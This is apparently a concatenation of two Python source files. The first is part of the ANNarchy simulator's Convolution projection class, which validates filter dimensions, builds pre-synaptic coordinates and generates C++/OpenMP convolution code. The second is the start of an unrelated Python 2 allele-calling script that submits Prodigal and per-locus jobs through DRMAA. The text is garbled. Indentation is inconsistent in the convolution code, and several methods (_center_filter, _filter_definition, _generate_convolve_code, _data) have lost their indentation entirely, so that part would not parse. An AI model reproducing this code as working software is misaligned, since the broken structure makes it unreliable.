            print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
            Global._error('Convolution: If the kernel has less dimensions than the pre-synaptic population, you need to set the flag keep_last_dimension to True.')
        if self.pre.geometry[-1] != self.post.geometry[-1]:
            print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
            Global._error('Convolution: If the kernel has fewer dimensions than the two populations (keep_last_dimension=True), these must have the same number of neurons in the last dimension.')

    # If the last dim of the kernel matches the last dim of the pre-pop, the post-pop can have one dimension less.
    if self.dim_post < self.dim_pre:  # OK, but check the last dimension of the kernel has the same size as the pre-population
        if self.weights.shape[-1] != self.pre.geometry[-1]:
            print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
            Global._error('Convolution: If the post-synaptic population has less dimensions than the pre-synaptic one, the last dimension of the filter must be equal to the last of the pre-synaptic population.')

    # The last dimension of the post population must correspond to the number of filters
    if self.weights.shape[0] != self.post.geometry[-1]:
        print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
        Global._error('Convolution: For multiple filters, the last dimension of the post-synaptic population must have as many neurons as there are filters.')

    # Generate the pre-synaptic coordinates
    self._generate_pre_coordinates_bank()

    # Finish building the synapses
    self._create()

    # For copy
    self._used_bank_of_filters = True

    return self
def _copy(self, pre, post):
    "Returns a copy of the projection when creating networks. Internal use only."
    copied_proj = Convolution(
        pre=pre,
        post=post,
        target=self.target,
        operation=self.operation,
        name=self.name,
        copied=True,
    )

    # Transfer the connection configuration verbatim.
    copied_proj.delays = self.delays
    copied_proj.weights = self.weights
    copied_proj.subsampling = self.subsampling
    copied_proj.keep_last_dimension = self.keep_last_dimension
    copied_proj.padding = self.padding
    copied_proj.multiple = self.multiple
    copied_proj.dim_kernel = self.weights.ndim
    copied_proj.dim_pre = self.pre.dimension
    copied_proj.dim_post = self.post.dimension

    # Re-generate the coordinates with the same connect_*() variant that
    # was used on the original projection.
    if self._used_single_filter:
        copied_proj._generate_pre_coordinates()
    elif self._used_bank_of_filters:
        copied_proj._generate_pre_coordinates_bank()
    else:
        raise ValueError("Either use single filter or bank of filter must be True! (Missing connect?)")

    copied_proj._create()

    # Carry over the low-level connectivity bookkeeping.
    copied_proj._connection_method = self._connection_method
    copied_proj._connection_args = self._connection_args
    copied_proj._connection_delay = self._connection_delay
    copied_proj._storage_format = self._storage_format
    return copied_proj
def _create(self):
    """Set up a dummy LIL connectivity object, needed only so that the
    code-generation/compilation pipeline has something to work with."""
    try:
        from ANNarchy.core.cython_ext.Connector import LILConnectivity
    except Exception as err:
        Global._print(err)
        Global._error('ANNarchy was not successfully installed.')

    self.connector_name = "Convolution"
    self.connector_description = "Convolution"

    fake_lil = LILConnectivity()
    fake_lil.max_delay = self.delays
    fake_lil.uniform_delay = self.delays
    self._store_connectivity(self._load_from_lil, (fake_lil, ), self.delays)
################################
### Create connection pattern
################################
def _connect(self, module):
    """
    Builds up dendrites either from list or dictionary. Called by instantiate().
    """
    if not self._connection_method:
        Global._error('Convolution: The projection between ' + self.pre.name + ' and ' + self.post.name + ' is declared but not connected.')

    # Instantiate the generated Cython wrapper for this projection.
    wrapper = getattr(module, f'proj{self.id}_wrapper')
    self.cyInstance = wrapper(self.weights, self.pre_coordinates)

    # Delays can only be set once the Cython instance exists; they are
    # expressed in multiples of dt.
    if self.delays > 0.0:
        self.cyInstance.set_delay(self.delays / Global.config['dt'])
def _generate_pre_coordinates(self):
    """Computes, for each post-synaptic neuron, the coordinates of the
    pre-synaptic neuron at the center of its filter, and stores them in
    ``self.pre_coordinates``.

    If ``subsampling`` was provided by the user it is validated and used
    directly; otherwise the centers are derived from the two geometries,
    with automatic down-sampling when the pre-population is larger.
    """
    import itertools

    # Check if the list is already defined:
    if self.subsampling:
        try:
            shape = np.array(self.subsampling).shape
        # Narrowed from a bare `except:`, which also swallowed
        # SystemExit and KeyboardInterrupt.
        except Exception:
            Global._error('Convolution: The sub-sampling list must have', self.post.size, 'elements of size', self.pre.dimension)
            return
        if shape != (self.post.size, self.pre.dimension):
            Global._error('Convolution: The sub-sampling list must have', self.post.size, 'elements of size', self.pre.dimension)
            return
        self.pre_coordinates = self.subsampling
        return

    # Otherwise create it, possibly with sub-sampling.
    # Compute, per pre-dimension, the list of candidate center indices.
    idx_range = []
    for dim in range(self.dim_pre):
        if dim < self.dim_post:
            pre_size = int(self.pre.geometry[dim])
            post_size = int(self.post.geometry[dim])
            sample = int(pre_size / post_size)
            if post_size * sample != pre_size:
                Global._error('Convolution: The pre-synaptic dimensions must be a multiple of the post-synaptic ones for down-sampling to work.')
            # Centers are evenly spaced, offset to the middle of each stride.
            idx_range.append([int((sample - 1) / 2) + sample * i for i in range(post_size)])
        else:  # extra dimension
            if self.keep_last_dimension:
                idx_range.append(range(self.post.geometry[dim]))
            else:
                idx_range.append([self._center_filter(self.weights.shape[dim])])

    # Cartesian product over the per-dimension index lists; this replaces
    # the previous hand-written 1D/2D/3D/4D loop nests (marked TODO) and
    # produces the same rank ordering for any number of dimensions.
    coords = [list(coord) for coord in itertools.product(*idx_range)]

    # Save the result
    self.pre_coordinates = coords
def _generate_pre_coordinates_bank(self):
    """Computes, for each post-synaptic neuron, the center coordinates of
    its filter when the weights form a bank of filters; the filter index
    is appended as the last (fastest-varying) coordinate.

    Stores the result in ``self.pre_coordinates``.
    """
    import itertools

    # Axis 0 of the weights array enumerates the filters.
    self.nb_filters = self.weights.shape[0]
    self.dim_single_filter = self.weights.shape[1:]

    # Check if the list is already defined:
    if self.subsampling:
        try:
            shape = np.array(self.subsampling).shape
        # Narrowed from a bare `except:`, which also swallowed
        # SystemExit and KeyboardInterrupt.
        except Exception:
            Global._error('Convolution: The sub-sampling list must have', self.post.size / self.post.geometry[-1], 'elements of size', self.pre.dimension)
            return
        # Integer division: the expected element count is a whole number
        # (true division produced a float, relying on 12.0 == 12).
        if shape != (self.post.size // self.post.geometry[-1], self.pre.dimension):
            Global._error('Convolution: The sub-sampling list must have', self.post.size / self.post.geometry[-1], 'elements of size', self.pre.dimension)
            return
        self.pre_coordinates = [c + [d] for c in self.subsampling for d in range(self.nb_filters)]
        return

    # Otherwise create it, possibly with sub-sampling.
    # Compute, per pre-dimension, the list of candidate center indices.
    idx_range = []
    for dim in range(self.dim_pre):
        # The last post dimension holds the filter index, so only
        # dim_post - 1 spatial dimensions are matched against the pre-pop.
        if dim < self.dim_post - 1:
            pre_size = self.pre.geometry[dim]
            post_size = self.post.geometry[dim]
            sample = int(pre_size / post_size)
            if post_size * sample != pre_size:
                Global._error('Convolution: The pre-synaptic dimensions must be a multiple of the post-synaptic ones for down-sampling to work.')
            idx_range.append([int((sample - 1) / 2) + sample * i for i in range(post_size)])
        else:  # extra dimension
            if self.keep_last_dimension:
                idx_range.append(range(self.post.geometry[dim]))
            else:
                # dim + 1 skips the filter-bank axis of the weights array.
                idx_range.append([self._center_filter(self.weights.shape[dim + 1])])

    # Cartesian product of the spatial indices with the filter index
    # appended as the innermost loop; this replaces the previous
    # hand-written 1D/2D/3D/4D loop nests (marked TODO) and produces the
    # same rank ordering for any number of dimensions.
    coords = [
        list(coord) + [d]
        for coord in itertools.product(*idx_range)
        for d in range(self.nb_filters)
    ]

    # Save the result
    self.pre_coordinates = coords
################################
# Code generation
################################
def _generate(self):
    """
    Overrides default code generation. This function is called during the code generation procedure.
    """
    # Obtain the C++/Cython declarations for the filter weights.
    filter_definition, filter_pyx_definition = self._filter_definition()

    # Pick the convolution kernel depending on whether a bank of filters
    # or a single filter is used.
    if self.multiple:
        convolve_code, sum_code = self._generate_bank_code()
    else:
        convolve_code, sum_code = self._generate_convolve_code()

    # Only the OpenMP backend is implemented for convolutions.
    if Global._check_paradigm("openmp"):
        self._generate_omp(filter_definition, filter_pyx_definition, convolve_code, sum_code)
    elif Global._check_paradigm("cuda"):
        raise NotImplementedError
    else:
        raise NotImplementedError
    def _generate_omp(self, filter_definition, filter_pyx_definition, convolve_code, sum_code, kernel=True):
        """
        OpenMP code generation.

        Populates ``self._specific_template`` with the C++/Cython snippets used
        by the ANNarchy code generator: accessors for the shared filter ``w``,
        the weighted-sum (psp) kernel, and memory bookkeeping helpers.

        :param filter_definition: C++ declaration of ``w`` from _filter_definition().
        :param filter_pyx_definition: matching Cython declaration.
        :param convolve_code: loop nest from _generate_convolve_code()/_generate_bank_code().
        :param sum_code: expression accumulated into the post-synaptic sum.
        :param kernel: if True, expose a single shared kernel instead of per-synapse weights.
        """
        # Basic ids
        base_ids = {
            'id_proj': self.id,
            'size_post': self.post.size,
            'float_prec': Global.config['precision']
        }
        # Fill the basic definitions (on a deep copy, so the shared template
        # dictionary is not mutated).
        conv_dict = deepcopy(convole_template_omp)
        for key, value in conv_dict.items():
            value = value % base_ids
            conv_dict[key] = value
        self._specific_template.update(conv_dict)
        # Kernel-based method: specify w with the correct dimension
        if kernel:
            self._specific_template['declare_parameters_variables'] = tabify(filter_definition.strip(), 1)
            self._specific_template['export_parameters_variables'] = ""
            # C++ getter/setter for the whole filter; the type is derived from
            # its declaration by dropping the trailing ' w;'.
            self._specific_template['access_parameters_variables'] = """
    // Local parameter w
    %(type_w)s get_w() { return w; }
    void set_w(%(type_w)s value) { w = value; }
""" % {'type_w': filter_definition.replace(' w;', '')}
            self._specific_template['export_connectivity'] += """
        # Local variable w
        %(type_w)s get_w()
        void set_w(%(type_w)s)
""" % {'type_w': filter_pyx_definition.replace(' w', '')}
            self._specific_template['wrapper_init_connectivity'] += """
        proj%(id_proj)s.set_w(weights)
""" % {'id_proj': self.id}
            # All dendrite-level accessors alias the single shared filter;
            # per-synapse access is meaningless here and returns 0.0 / no-ops.
            self._specific_template['wrapper_access_connectivity'] += """
    # Local variable w
    def get_w(self):
        return proj%(id_proj)s.get_w()
    def set_w(self, value):
        proj%(id_proj)s.set_w( value )
    def get_dendrite_w(self, int rank):
        return proj%(id_proj)s.get_w()
    def set_dendrite_w(self, int rank, value):
        proj%(id_proj)s.set_w(value)
    def get_synapse_w(self, int rank_post, int rank_pre):
        return 0.0
    def set_synapse_w(self, int rank_post, int rank_pre, %(float_prec)s value):
        pass
""" % {'id_proj': self.id, 'float_prec': Global.config['precision']}
        # Override the monitor to avoid recording the weights
        self._specific_template['monitor_class'] = ""
        self._specific_template['monitor_export'] = ""
        self._specific_template['monitor_wrapper'] = ""
        # OMP code
        omp_code = ""
        if Global.config['num_threads'] > 1:
            omp_code = """
        #pragma omp for private(sum, rk_pre, coord) %(psp_schedule)s""" % {'psp_schedule': "" if not 'psp_schedule' in self._omp_config.keys() else self._omp_config['psp_schedule']}
        # HD ( 16.10.2015 ):
        # pre-load delayed firing rate in a local array, so we
        # prevent multiple accesses to pop%(id_pre)s._delayed_r[delay-1]
        # wheareas delay is set available as variable
        # TODO HD: wouldn't it be much better to reduce delay globaly, instead of the substraction here???
        if self.delays > Global.config['dt']:
            pre_load_r = """
        // pre-load delayed firing rate
        auto delayed_r = pop%(id_pre)s._delayed_r[delay-1];
""" % {'id_pre': self.pre.id}
        else:
            pre_load_r = ""
        # Compute sum: outer loop over post-synaptic neurons, convolution inside.
        wsum = """
        if ( _transmission && pop%(id_pre)s._active ) {
        int* coord;
""" + pre_load_r + """
        %(omp_code)s
        for(int i = 0; i < %(size_post)s; i++){
            coord = pre_coords[i].data();
            // perform the convolution
""" + tabify(convolve_code, 1) + """
            // store result
            pop%(id_post)s._sum_%(target)s[i] += """ + sum_code + """;
        } // for
        } // if
"""
        self._specific_template['psp_code'] = wsum % \
            { 'id_proj': self.id,
              'target': self.target,
              'id_pre': self.pre.id, 'name_pre': self.pre.name, 'size_pre': self.pre.size,
              'id_post': self.post.id, 'name_post': self.post.name, 'size_post': self.post.size,
              'omp_code': omp_code,
              'convolve_code': convolve_code
            }
        # Rough memory accounting for the report; the filter itself is still TODO.
        self._specific_template['size_in_bytes'] = """
        // post-ranks
        size_in_bytes += sizeof(std::vector<int>);
        size_in_bytes += post_rank.capacity() * sizeof(int);
        // pre-coords
        size_in_bytes += sizeof(std::vector<std::vector<int>>);
        size_in_bytes += pre_coords.capacity() * sizeof(std::vector<int>);
        for (auto it = pre_coords.begin(); it != pre_coords.end(); it++) {
            size_in_bytes += it->capacity() * sizeof(int);
        }
        // filter
        // TODO:
"""
        self._specific_template['clear'] = """
        // post-ranks
        post_rank.clear();
        post_rank.shrink_to_fit();
        // pre-coords
        for (auto it = pre_coords.begin(); it != pre_coords.end(); it++) {
            it->clear();
            it->shrink_to_fit();
        }
        pre_coords.clear();
        pre_coords.shrink_to_fit();
        // filter
        // TODO:
"""
################################
### Utilities
################################
def _center_filter(self, i):
return int(i/2) if i%2==1 else int(i/2)-1
def _filter_definition(self):
dim = self.dim_kernel
cpp = Global.config['precision']
pyx = Global.config['precision']
for d in range(dim):
cpp = 'std::vector< ' + cpp + ' >'
pyx = 'vector[' + pyx + ']'
cpp += ' w;'
pyx += ' w'
return cpp, pyx
def _coordinates_to_rank(self, name, geometry):
dim = len(geometry)
txt = ""
for d in range(dim):
if txt == "" : # first coordinate is special
txt = indices[0] + "_" + name
else:
txt = str(geometry[d]) + '*(' + txt + ') + ' + indices[d] + '_' + name
return txt
def _generate_convolve_code(self):
# Operation to be performed: sum, max, min, mean
operation = self.synapse_type.operation
# Main code
code = tabify("sum = 0.0;\n", 3)
# Generate for loops
for dim in range(self.dim_kernel):
if dim == self.dim_kernel-1:
inner_idx = ""
for i in range(self.dim_kernel-1):
inner_idx += "["+indices[i]+"_w]"
code += "auto inner_line = w"+inner_idx+".data();\n"
code += tabify("""
for(int %(index)s_w = 0; %(index)s_w < %(size)s;%(index)s_w++) {
""" % { 'index': indices[dim], 'size': self.weights.shape[dim]}, dim)
# Compute indices
if dim < self.dim_kernel:
code += tabify(
"""int %(index)s_pre = coord[%(dim)s] %(operator)s (%(index)s_w - %(center)s);""" %
{
'id_proj': self.id,
'index': indices[dim],
'dim': dim,
'operator': '+' ,
'center': self._center_filter(self.weights.shape[dim])
}, 1)
else:
code += tabify(
"""int %(index)s_pre = coord[%(dim)s];""" %
{
'id_proj': self.id,
'index': indices[dim],
'dim': dim
}, 1)
# Check indices
if operation in ['sum', 'mean']:
if isinstance(self.padding, str): # 'border'
code += tabify("""
if (%(index)s_pre < 0) %(index)s_pre = 0 ;
if (%(index)s_pre > %(max_size)s) %(index)s_pre = %(max_size)s ;
""" % { 'index': indices[dim], 'dim': dim, 'max_size': self.pre.geometry[dim] -1}, dim)
else:
code += tabify("""
if ((%(index)s_pre < 0) || (%(index)s_pre > %(max_size)s)){
sum += %(padding)s;
continue;
}
""" % { 'index': indices[dim], 'padding': self.padding, 'max_size': self.pre.geometry[dim] -1}, dim)
else: # min, max
code += """
if ((%(index)s_pre < 0) || (%(index)s_pre > %(max_size)s)) {
continue;
}
""" % { 'index': indices[dim], 'max_size': self.pre.geometry[dim] -1}
# if True, we need to take the last dimension from coords
if self.keep_last_dimension:
id_dict = {
'index': indices[self.dim_kernel],
'dim': self.dim_kernel
}
code += "int %(index)s_pre = coord[%(dim)s];" % id_dict
# Compute pre-synaptic rank
code += tabify("""
rk_pre = %(value)s;""" % {'value': self._coordinates_to_rank('pre', self.pre.geometry)}, dim)
# Compute the increment
index = ""
for dim in range(self.dim_kernel):
index += '[' + indices[dim] + '_w]'
increment = self.synapse_type.description['psp']['cpp'] % {
'id_pre': self.pre.id,
'id_post': self.post.id,
'local_index': index,
'global_index': '[i]',
'pre_index': '[rk_pre]',
'post_index': '[rk_post]',
'pre_prefix': 'pop'+str(self.pre.id)+'.',
'post_prefix': 'pop'+str(self.post.id)+'.'
}
# Delays
if self.delays > Global.config['dt']:
increment = increment.replace(
'pop%(id_pre)s.r[rk_pre]' % {'id_pre': self.pre.id},
'delayed_r[rk_pre]'
)
# Apply the operation
if operation == "sum":
if self.dim_kernel == 1:
code += tabify("""
sum += %(increment)s""" % {'increment': increment}, dim)
else:
code += tabify("""
sum += %(increment)s""" % {'increment': increment.replace('w'+inner_idx, 'inner_line')}, dim)
elif operation == "max":
code += tabify("""
%(float_prec)s _psp = %(increment)s
if(_psp > sum) sum = _psp;""" % {'increment': increment, 'float_prec': Global.config['precision']}, dim)
elif operation == "min":
code += tabify("""
%(float_prec)s _psp = %(increment)s
if(_psp < sum) sum = _psp;""" % {'increment': increment, 'float_prec': Global.config['precision']}, dim)
elif operation == "mean":
code += tabify("""
sum += %(increment)s""" % {'increment': increment}, dim)
else:
Global._error('Convolution: Operation', operation, 'is not implemented yet for shared projections.')
# Close for loops
for dim in range(self.dim_kernel):
code += tabify("""
}""", self.dim_kernel-1-dim)
impl_code = code % {'id_proj': self.id,
'target': self.target,
'id_pre': self.pre.id,
'name_pre': self.pre.name,
'size_pre': self.pre.size,
'id_post': self.post.id,
'name_post': self.post.name,
'size_post': self.post.size
}
# sum code
self.weights.size
if operation == "mean":
sum_code = """sum/%(filter_size)s""" % {'filter_size': self.weights.size}
else:
sum_code = "sum"
return impl_code, sum_code
    def _generate_bank_code(self):
        """
        Build the C++ loop nest convolving one filter out of a filter bank.

        The last coordinate of each post-synaptic neuron (``coord[dim_pre]``)
        selects the filter in the bank; the remaining kernel dimensions are
        looped over. Returns ``(impl_code, sum_code)`` like
        :meth:`_generate_convolve_code`.
        """
        # Operation to be performed: sum, max, min, mean
        operation = self.synapse_type.operation
        # Main code
        code = tabify("sum = 0.0;\n", 3)
        # Generate for loops (dim_kernel-1 spatial dimensions; the first filter
        # axis indexes the bank and is not looped).
        for dim in range(self.dim_kernel-1):
            code += tabify("""
for(int %(index)s_w = 0; %(index)s_w < %(size)s;%(index)s_w++) {
""" % { 'index': indices[dim], 'size': self.weights.shape[dim+1]}, dim)
            # Compute indices
            # NOTE(review): this condition is always true inside the loop, so
            # the else branch below looks unreachable — confirm before removing.
            if dim < self.dim_kernel:
                code += tabify(
                    """int %(index)s_pre = coord[%(dim)s] %(operator)s (%(index)s_w - %(center)s);""" %
                    {
                        'id_proj': self.id,
                        'index': indices[dim],
                        'dim': dim,
                        'operator': '+',
                        'center': self._center_filter(self.weights.shape[dim+1])
                    }, 1)
            else:
                code += tabify(
                    """int %(index)s_pre = coord[%(dim)s];""" %
                    {
                        'id_proj': self.id,
                        'index': indices[dim],
                        'dim': dim
                    }, 1)
            # Check indices: clamp at the border or add the padding value;
            # min/max skip out-of-range taps.
            if operation in ['sum', 'mean']:
                if isinstance(self.padding, str): # 'border'
                    code += tabify("""
if (%(index)s_pre < 0) %(index)s_pre = 0 ;
if (%(index)s_pre > %(max_size)s) %(index)s_pre = %(max_size)s ;
""" % { 'index': indices[dim], 'dim': dim, 'max_size': self.pre.geometry[dim] -1}, 1+dim)
                else:
                    code += tabify("""
if ((%(index)s_pre < 0) || (%(index)s_pre > %(max_size)s)) {
    sum += %(padding)s;
    continue;
}
""" % { 'index': indices[dim], 'padding': self.padding, 'max_size': self.pre.geometry[dim] -1}, 1+dim)
            else: # min, max
                code += tabify("""
if ((%(index)s_pre < 0) || (%(index)s_pre > %(max_size)s)){
    continue;
}
""" % { 'index': indices[dim], 'max_size': self.pre.geometry[dim] -1}, 1+dim)
        # Compute pre-synaptic rank
        code +=tabify("""
rk_pre = %(value)s;""" % {'value': self._coordinates_to_rank('pre', self.pre.geometry)}, 1+dim)
        # Compute the increment: the first index selects the filter in the bank.
        index = "[coord["+str(self.dim_pre)+"]]"
        for dim in range(self.dim_kernel-1):
            index += '[' + indices[dim] + '_w]'
        increment = self.synapse_type.description['psp']['cpp'] % {
            'id_pre': self.pre.id,
            'id_post': self.post.id,
            'local_index': index,
            'global_index': '[i]',
            'pre_index': '[rk_pre]',
            'post_index': '[rk_post]',
            'pre_prefix': 'pop'+str(self.pre.id)+'.',
            'post_prefix': 'pop'+str(self.post.id)+'.'}
        # Delays: read from the delayed firing-rate buffer instead of pop.r.
        if self.delays > Global.config['dt']:
            increment = increment.replace(
                'pop%(id_pre)s.r[rk_pre]' % {'id_pre': self.pre.id},
                'delayed_r[rk_pre]'
            )
        # Apply the operation
        if operation == "sum":
            code += tabify("""
sum += %(increment)s""" % {'increment': increment}, 1+dim)
        elif operation == "max":
            code += tabify("""
%(float_prec)s _psp = %(increment)s
if(_psp > sum) sum = _psp;""" % {'increment': increment, 'float_prec': Global.config['precision']}, 1+dim)
        elif operation == "min":
            code += tabify("""
%(float_prec)s _psp = %(increment)s
if(_psp < sum) sum = _psp;""" % {'increment': increment, 'float_prec': Global.config['precision']}, 1+dim)
        elif operation == "mean":
            code += tabify("""
sum += %(increment)s""" % {'increment': increment}, 1+dim)
        else:
            Global._error('SharedProjection: Operation', operation, 'is not implemented yet for shared projections.')
        # Close for loops
        for dim in range(self.dim_kernel-1):
            code += tabify("""
}""", self.dim_kernel-1-dim)
        impl_code = code % {'id_proj': self.id,
            'target': self.target,
            'id_pre': self.pre.id, 'name_pre': self.pre.name, 'size_pre': self.pre.size,
            'id_post': self.post.id, 'name_post': self.post.name, 'size_post': self.post.size
        }
        # sum code
        if operation == "mean":
            sum_code = """sum/%(filter_size)s""" % {'filter_size': self.weights.size}
        else:
            sum_code = "sum"
        return impl_code, sum_code
##############################
## Override useless methods
##############################
def _data(self):
"Disable saving."
desc = {}
desc['post_ranks'] = self.post_ranks
desc['attributes'] = self.attributes
desc['parameters'] = self.parameters
desc['variables'] = self.variables
desc['dendrites'] = []
desc['number_of_synapses'] = 0
return desc
    def save_connectivity(self, filename):
        "Not available."
        # Connectivity is implicit in the convolution pattern: warn, don't fail.
        Global._warning('Convolutional projections can not be saved.')
    def save(self, filename):
        "Not available."
        # Saving is disabled for convolutions: warn, don't fail.
        Global._warning('Convolutional projections can not be saved.')
    def load(self, filename):
        "Not available."
        # Loading is disabled for convolutions: warn, don't fail.
        Global._warning('Convolutional projections can not be loaded.')
    def receptive_fields(self, variable = 'w', in_post_geometry = True):
        "Not available."
        # There are no per-neuron receptive fields to display: warn, don't fail.
        Global._warning('Convolutional projections can not display receptive fields.')
    def connectivity_matrix(self, fill=0.0):
        "Not available."
        # No explicit synapse matrix exists for a convolution: warn, don't fail.
        Global._warning('Convolutional projections can not display connectivity matrices.')
|
vitay/ANNarchy
|
ANNarchy/extensions/convolution/Convolve.py
|
Python
|
gpl-2.0
| 41,839
|
[
"NEURON"
] |
c3342615213cbb6735e189b96a120d66b675e96ebf4c060a535689ff83148861
|
#!/usr/bin/python
import HTSeq
import sys
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna
from Bio.Blast import NCBIXML
from Bio.Blast.Applications import NcbiblastnCommandline
from Bio.Blast.Applications import NcbiblastpCommandline
from Counter import Counter # --- Counter.py from python3 is needed to run this script --- #
#from collections import Counter
import os
import os.path
import string
import argparse
import subprocess
from CommonFastaFunctions import Create_Blastdb
from CommonFastaFunctions import LoadAlelleFasta
from CommonFastaFunctions import LoadAlellicProfileGeneric
from CommonFastaFunctions import WriteFasta
from CommonFastaFunctions import runBlast
from CommonFastaFunctions import runBlastParser
from Genes import Gene
from Genes import SetOfGenes
import time
import glob
import drmaa
import pickle
import shutil
# ================================================ MAIN ================================================ #
def main():
    """Allele calling over a set of genomes, distributed on a DRMAA cluster.

    Workflow:
      1. Read the genome list (-i) and the gene/locus list (-g).
      2. Submit one runProdigal.py job per genome (ORF prediction) and wait.
      3. Submit one callAlleles.py job per locus and collect each job.
      4. Load the pickled per-locus results and write either a PhyloViz-style
         profile matrix (default) or one output file per genome.

    NOTE(review): this is Python 2 code (print statements) and requires a
    working DRMAA session plus runProdigal.py/callAlleles.py in the current
    working directory.
    """
    #time ./alleleCalling_ORFbased_main.py -i asd.txt -g allffn.txt -o out_all_fnn_spades.txt -p True
    parser = argparse.ArgumentParser(description="This program screens a set of genes in a fasta file.")
    parser.add_argument('-i', nargs='?', type=str, help='List of genome files (list of fasta files)', required=True)
    parser.add_argument('-g', nargs='?', type=str, help='List of genes (fasta)', required=True)
    parser.add_argument('-o', nargs='?', type=str, help="Name of the output files", required=True)
    parser.add_argument('-p', nargs='?', type=str, help="True to give a phyloviz output file type, false is predefined", required=False)
    args = parser.parse_args()
    genomeFiles = args.i
    genes = args.g
    phylovizinput=True
    # NOTE(review): args.p is a string, so any non-empty value (including the
    # string "False") keeps the PhyloViz branch below enabled — confirm intended.
    if(args.p):
        phylovizinput=args.p
    print ("Starting Script at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
    listOfCDSDicts = []
    listOfGenomes = []
    listOfGenomesDict = []
    # Read the genome list: one path per line, strip LF and CR.
    fp = open(genomeFiles, 'r')
    for genomeFile in fp:
        genomeFile = genomeFile.rstrip('\n')
        genomeFile = genomeFile.rstrip('\r')
        listOfGenomes.append( genomeFile )
        genomeDict = {}
    fp.close()
    # Read the locus list; pickle per-locus argument lists into <genes>/temp
    # for the cluster jobs to pick up.
    gene_fp = open( genes, 'r')
    genepath=''
    basepath=''
    lGenesFiles = []
    argumentsList = []
    for gene in gene_fp:
        gene = gene.rstrip('\n')
        lGenesFiles.append( gene )
        genepath=os.path.dirname(gene)
        basepath=os.path.join(genepath, "temp")
        if not os.path.exists(basepath):
            os.makedirs(basepath)
        filepath=os.path.join(basepath,str(os.path.basename(gene))+"_argList.txt")
        with open(filepath, 'wb') as f:
            var = [gene, listOfGenomes]
            pickle.dump(var, f)
        argumentsList.append(filepath)
    # callAlleles([gene, listOfGenomes, listOfCDSDicts, listOfGenomesDict])
    gene_fp.close()
    # ------------------------------------------------- #
    #           RUN PRODIGAL OVER ALL GENOMES           #
    # ------------------------------------------------- #
    print ("Starting Prodigal at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
    #poolJobs = Pool()
    totgenomes= len(listOfGenomes)
    """for genome in listOfGenomes:
        #print genome
        #listOfCDSDicts.append(runProdigal(genome))
        filepath=os.path.join(basepath,str(os.path.basename(genome))+"_ORF.txt")
        with open(filepath, 'wb') as f:
            var = runProdigal(genome)
            pickle.dump(var, f)"""
    joblist =[]
    # One Prodigal job per genome; synchronize() blocks until all finish.
    with drmaa.Session() as s:
        for genome in listOfGenomes:
            #print('Creating job template')
            jt = s.createJobTemplate()
            #print os.path.join(os.getcwd(), 'callAlleles.py')
            jt.remoteCommand = os.path.join(os.getcwd(), 'runProdigal.py')
            #print argList
            jt.args = [str(genome),basepath]
            jt.joinFiles=True
            jt.nativeSpecification='-V'
            jobid = s.runJob(jt)
            joblist.append(jobid)
            # Keep a record of submitted job ids for debugging.
            with open("jobsid.txt","a") as f:
                f.write(str(genome)+"\n"+str(jobid))
            print('Your job has been submitted with ID %s' % jobid)
            #print('Cleaning up')
            s.deleteJobTemplate(jt)
        s.synchronize(joblist, drmaa.Session.TIMEOUT_WAIT_FOREVER, True)
        #for curjob in joblist:
        #    print 'Collecting job ' + curjob
        #    retval = s.wait(curjob, drmaa.Session.TIMEOUT_WAIT_FOREVER)
        #    print 'Job: ' + str(retval.jobId) + ' finished with status ' + str(retval.hasExited)
    print ("Finishing Prodigal at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
    # ----------------------------- #
    # Each gene has a different job #
    # ----------------------------- #
    print
    print ("Starting Allele Calling at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
    #output=callAlleles([gene, listOfGenomes, listOfCDSDicts, listOfGenomesDict])
    #print output
    # raise SystemExit
    totloci= len(argumentsList)
    joblist =[]
    # One allele-calling job per locus; collected one by one with wait().
    with drmaa.Session() as s:
        for argList in argumentsList:
            #print('Creating job template')
            jt = s.createJobTemplate()
            #print os.path.join(os.getcwd(), 'callAlleles.py')
            jt.remoteCommand = os.path.join(os.getcwd(), 'callAlleles.py')
            #print argList
            jt.args = [str(argList),basepath]
            jt.joinFiles=True
            jt.nativeSpecification='-V'
            jobid = s.runJob(jt)
            joblist.append(jobid)
            with open("jobsid.txt","a") as f:
                f.write(str(argList)+"\n"+str(jobid))
            print('Your job has been submitted with ID %s' % jobid)
            #print('Cleaning up')
            s.deleteJobTemplate(jt)
        #s.synchronize(joblist, drmaa.Session.TIMEOUT_WAIT_FOREVER, True)
        for curjob in joblist:
            print 'Collecting job ' + curjob
            retval = s.wait(curjob, drmaa.Session.TIMEOUT_WAIT_FOREVER)
            print 'Job: ' + str(retval.jobId) + ' finished with status ' + str(retval.hasExited)
    print ("Finished Allele Calling at : "+time.strftime("%H:%M:%S-%d/%m/%Y"))
    # Collect per-locus pickled results, then remove the temporary work dirs.
    output=[]
    for gene in lGenesFiles:
        filepath=os.path.join(basepath, os.path.basename(gene)+"_result.txt")
        with open(filepath,'rb') as f:
            var = pickle.load(f)
            output.append(var)
    shutil.rmtree(basepath)
    shutil.rmtree(os.path.join(os.path.dirname(gene), "blastdbs"))
    # Summary statistics printed to stdout (Python 2 print statements).
    print "##################################################\n %s genomes used for %s loci" % (len(output[0][0]),len(output) )
    numberexactmatches=0
    for gene in output:
        for gAllele in gene[0]:
            if("EXC:" in gAllele):
                numberexactmatches+=1
    print "\n %s exact matches found out of %s" % (numberexactmatches,(len(output[0][0])*len(output)) )
    print "\n %s percent of exact matches \n##################################################" % (float((numberexactmatches*100)/(len(output[0][0])*len(output))) )
    print "\nWriting output files\n"
    args.o = '/' + args.o
    if(phylovizinput is False):
        # One output file per genome, one "allele:locus" line per locus.
        genesI=0
        for geneOut in output:
            i=0
            for gAllele in geneOut[0]:
                currentGenome = listOfGenomes[i]
                currentGenome=currentGenome.split("/")
                currentGenome=currentGenome[len(currentGenome)-1].split(".")
                gOutFile = os.path.dirname( "./" )
                finalname=(args.o).split("/")
                gOutFile += "/"+str(currentGenome[0])+finalname[1]
                # Truncate on the first locus of the first gene, append afterwards.
                if not os.path.isfile( gOutFile )or (i==0 and genesI==0):
                    aux = 'w'
                else:
                    aux = 'a'
                gAllele = '\n' + gAllele
                f = open(gOutFile, aux)
